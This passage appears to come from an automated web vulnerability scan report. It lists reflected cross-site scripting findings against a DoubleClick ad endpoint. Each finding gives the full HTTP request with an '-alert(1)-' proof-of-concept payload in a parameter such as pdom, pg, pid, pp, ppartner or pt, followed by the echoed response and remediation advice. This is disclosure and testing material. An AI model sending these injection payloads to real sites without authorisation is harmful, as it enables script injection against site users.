GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=d1f6e'-alert(1)-'7a9c8a63dbf&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=d1f6e'-alert(1)-'7a9c8a63dbf&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011. ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 576c0"-alert(1)-"3511e11aea was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=576c0"-alert(1)-"3511e11aea&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... ://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=576c0"-alert(1)-"3511e11aea&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N58 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbdf0'-alert(1)-'26ef0e3c3aa was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=fbdf0'-alert(1)-'26ef0e3c3aa&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... ://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=fbdf0'-alert(1)-'26ef0e3c3aa&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N58 ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2fa"-alert(1)-"b9c64a612f4 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b2fa"-alert(1)-"b9c64a612f4&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... &h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b2fa"-alert(1)-"b9c64a612f4&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334"); var wmode = "opaque"; var ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0253'-alert(1)-'fc73d229855 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAte0253'-alert(1)-'fc73d229855&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... &h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAte0253'-alert(1)-'fc73d229855&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334\"> ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8473c'-alert(1)-'4cff64c594a was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=8473c'-alert(1)-'4cff64c594a&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=8473c'-alert(1)-'4cff64c594a&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp. ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4502"-alert(1)-"bcfcfdf8581 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=b4502"-alert(1)-"bcfcfdf8581&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=b4502"-alert(1)-"bcfcfdf8581&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp. ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ff3"-alert(1)-"a09a67b2d18 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=10059ff3"-alert(1)-"a09a67b2d18&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=10059ff3"-alert(1)-"a09a67b2d18&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-st ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6f6'-alert(1)-'3317ede0935 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1008c6f6'-alert(1)-'3317ede0935&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1008c6f6'-alert(1)-'3317ede0935&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-st ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff586'-alert(1)-'c05e9585e21 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=ff586'-alert(1)-'c05e9585e21&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=ff586'-alert(1)-'c05e9585e21&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/d ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5519"-alert(1)-"fd76ab44770 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=d5519"-alert(1)-"fd76ab44770&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=d5519"-alert(1)-"fd76ab44770&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/d ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6771d'-alert(1)-'1a16a6a8536 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24046771d'-alert(1)-'1a16a6a8536&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24046771d'-alert(1)-'1a16a6a8536&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/ ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30d94"-alert(1)-"9c506468d33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
